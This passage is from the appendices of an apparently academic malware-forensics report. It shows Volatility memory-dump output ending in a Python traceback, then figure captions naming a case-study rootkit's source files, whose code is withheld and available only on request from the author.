0x79000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x47b000 File Offset: 0x7a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x47c000 File Offset: 0x7b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x47d000 File Offset: 0x7c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x47f000 File Offset: 0x7e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x480000 File Offset: 0x7f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x481000 File Offset: 0x80000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x482000 File Offset: 0x81000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x483000 File Offset: 0x82000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x484000 File Offset: 0x83000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x485000 File Offset: 0x84000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x487000 File Offset: 0x86000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x488000 File Offset: 0x87000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x489000 File Offset: 0x88000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x48a000 File Offset: 0x89000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x48c000 File Offset: 0x8b000 Size: 0x1000 127

Memory Not Accessible: Virtual Address: 0x48d000 File Offset: 0x8c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x48e000 File Offset: 0x8d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x48f000 File Offset: 0x8e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x490000 File Offset: 0x8f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x491000 File Offset: 0x90000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x492000 File Offset: 0x91000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x493000 File Offset: 0x92000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x495000 File Offset: 0x94000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x496000 File Offset: 0x95000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x497000 File Offset: 0x96000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x498000 File Offset: 0x97000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x499000 File Offset: 0x98000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x49a000 File Offset: 0x99000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x49b000 File Offset: 0x9a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x49d000 File Offset: 0x9c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x49f000 File Offset: 0x9e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4a0000 File Offset: 0x9f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4a1000 File Offset: 0xa0000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4a2000 File Offset: 0xa1000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4a3000 File Offset: 0xa2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4a4000 File Offset: 0xa3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4a5000 File Offset: 0xa4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4a6000 File Offset: 0xa5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4a7000 File Offset: 0xa6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4a8000 File Offset: 0xa7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4a9000 File Offset: 0xa8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4aa000 File Offset: 0xa9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ab000 File Offset: 0xaa000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ac000 File Offset: 0xab000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ad000 File Offset: 0xac000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ae000 File Offset: 0xad000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4af000 File Offset: 0xae000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4b0000 File Offset: 0xaf000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4b1000 File Offset: 0xb0000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4b2000 File Offset: 0xb1000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4b3000 File Offset: 0xb2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4b4000 File Offset: 0xb3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4b5000 File Offset: 0xb4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4b6000 File Offset: 0xb5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4b7000 File Offset: 0xb6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4b8000 File Offset: 0xb7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4b9000 File Offset: 0xb8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ba000 File Offset: 0xb9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4bb000 File Offset: 0xba000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4bc000 File Offset: 0xbb000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4bd000 File Offset: 0xbc000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4be000 File Offset: 0xbd000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4bf000 File Offset: 0xbe000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4c0000 File Offset: 0xbf000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4c1000 File Offset: 0xc0000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4c2000 File Offset: 0xc1000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4c3000 File Offset: 0xc2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4c4000 File Offset: 0xc3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4c5000 File Offset: 0xc4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4c6000 File Offset: 0xc5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4c7000 File Offset: 0xc6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4c8000 File Offset: 0xc7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4c9000 File Offset: 0xc8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ca000 File Offset: 0xc9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4cb000 File Offset: 0xca000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4cc000 File Offset: 0xcb000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4cd000 File Offset: 0xcc000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ce000 File Offset: 0xcd000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4cf000 File Offset: 0xce000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4d0000 File Offset: 0xcf000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4d1000 File Offset: 0xd0000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4d2000 File Offset: 0xd1000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4d3000 File Offset: 0xd2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4d4000 File Offset: 0xd3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4d5000 File Offset: 0xd4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4d6000 File Offset: 0xd5000 Size: 0x1000 128

Memory Not Accessible: Virtual Address: 0x4d7000 File Offset: 0xd6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4d8000 File Offset: 0xd7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4d9000 File Offset: 0xd8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4da000 File Offset: 0xd9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4db000 File Offset: 0xda000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4dc000 File Offset: 0xdb000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4dd000 File Offset: 0xdc000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4de000 File Offset: 0xdd000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4df000 File Offset: 0xde000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4e0000 File Offset: 0xdf000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4e1000 File Offset: 0xe0000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4e2000 File Offset: 0xe1000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4e3000 File Offset: 0xe2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4e4000 File Offset: 0xe3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4e5000 File Offset: 0xe4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4e6000 File Offset: 0xe5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4e7000 File Offset: 0xe6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4e8000 File Offset: 0xe7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4e9000 File Offset: 0xe8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ea000 File Offset: 0xe9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4eb000 File Offset: 0xea000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ec000 File Offset: 0xeb000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ed000 File Offset: 0xec000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ee000 File Offset: 0xed000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ef000 File Offset: 0xee000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4f0000 File Offset: 0xef000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4f1000 File Offset: 0xf0000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4f2000 File Offset: 0xf1000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4f3000 File Offset: 0xf2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4f4000 File Offset: 0xf3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4f5000 File Offset: 0xf4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4f6000 File Offset: 0xf5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4f7000 File Offset: 0xf6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4f8000 File Offset: 0xf7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4f9000 File Offset: 0xf8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4fa000 File Offset: 0xf9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4fb000 File Offset: 0xfa000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4fc000 File Offset: 0xfb000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4fd000 File Offset: 0xfc000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4fe000 File Offset: 0xfd000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x4ff000 File Offset: 0xfe000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x500000 File Offset: 0xff000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x501000 File Offset: 0x100000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x502000 File Offset: 0x101000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x503000 File Offset: 0x102000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x504000 File Offset: 0x103000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x505000 File Offset: 0x104000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x506000 File Offset: 0x105000 Size: 0x1000 ************************************************************************ Dumping wuauclt.exe, pid: 484 output: executable.484.exe Memory Not Accessible: Virtual Address: 0x1004000 File Offset: 0x4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1005000 File Offset: 0x5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1006000 File Offset: 0x6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1009000 File Offset: 0x9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x100c000 File Offset: 0xc000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x100d000 File Offset: 0xd000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x100e000 File Offset: 0xe000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x100f000 File Offset: 0xf000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1012000 File Offset: 0x12000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1013000 File Offset: 0x13000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1014000 File Offset: 0x14000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1015000 File Offset: 0x15000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1016000 File Offset: 0x16000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1017000 File Offset: 0x17000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1018000 File Offset: 0x18000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1019000 File Offset: 0x19000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x101a000 File Offset: 0x1a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x101b000 File Offset: 0x1b000 Size: 0x1000 ************************************************************************ Traceback (most recent call last): File "volatility", line 219, in 129

main() File "volatility", line 212, in main modules[argv[1]].execute(argv[1], argv[2:]) File "/Users/steve/Downloads/Volatility-1.3_Beta/vmodules.py", line 62, in execute self.cmd_execute(module, args) File "/Users/steve/Downloads/Volatility-1.3_Beta/vmodules.py", line 1915, in procdump image_file_name = process_imagename(process_address_space, types, task) File "/Users/steve/Downloads/Volatility-1.3_Beta/forensics/win32/tasks.py", line 131, in process_imagename ['_EPROCESS', 'ImageFileName'], task_vaddr) File "/Users/steve/Downloads/Volatility-1.3_Beta/forensics/object.py", line 147, in read_null_string string = read_string(addr_space, types, member_list, vaddr, max_length) File "/Users/steve/Downloads/Volatility-1.3_Beta/forensics/object.py", line 141, in read_string val = addr_space.read(vaddr + offset, max_length) File "/Users/steve/Downloads/Volatility-1.3_Beta/forensics/x86.py", line 124, in read paddr = self.vtop(vaddr) File "/Users/steve/Downloads/Volatility-1.3_Beta/forensics/x86.py", line 109, in vtop if self.entry_present(pgd): File "/Users/steve/Downloads/Volatility-1.3_Beta/forensics/x86.py", line 72, in entry_present if (entry & (0x00000001)) == 0x00000001: TypeError: unsupported operand type(s) for &: 'NoneType' and 'int' bash-3.2$ exit exit

Script done on Sat Feb 5 15:33:52 2011

Figure 49 – Full output of Volatility analysis

130

Appendix C – Case study Rootkit source code please contact the author to request the source code

Figure 50 – main.c

Figure 51 – install_as_persistent.c

Figure 52 – version.c

Figure 53 – systeminfo.c

Figure 54 – create_sock.c

Figure 55 – download.c

Figure 56 – getnick.c

Figure 57 – http_readline.c

Figure 58 – randfilename.c

Figure 59 – getRandomPIN.c

Figure 60 – encoding.c

Figure 61 – debuggerdetect.c

Figure 62 – killprocess.c

Figure 63 – listprocesses.c

Figure 64 – keylogger.c

Figure 65 – keylogcontrol.c

Figure 66 – uploadkeylog.c

131

Figure 67 – update.c

Figure 68 – scanhost.c

Figure 69 – sleep.c

Figure 70 – vmdetect.c

Figure 71 – ms03_026.c

Figure 72 – ms04_011.c

Figure 73 – main.h

Figure 74 – version.h

Figure 75 – textstrings.h

132

Appendix D – Creation of infection ShellCode

133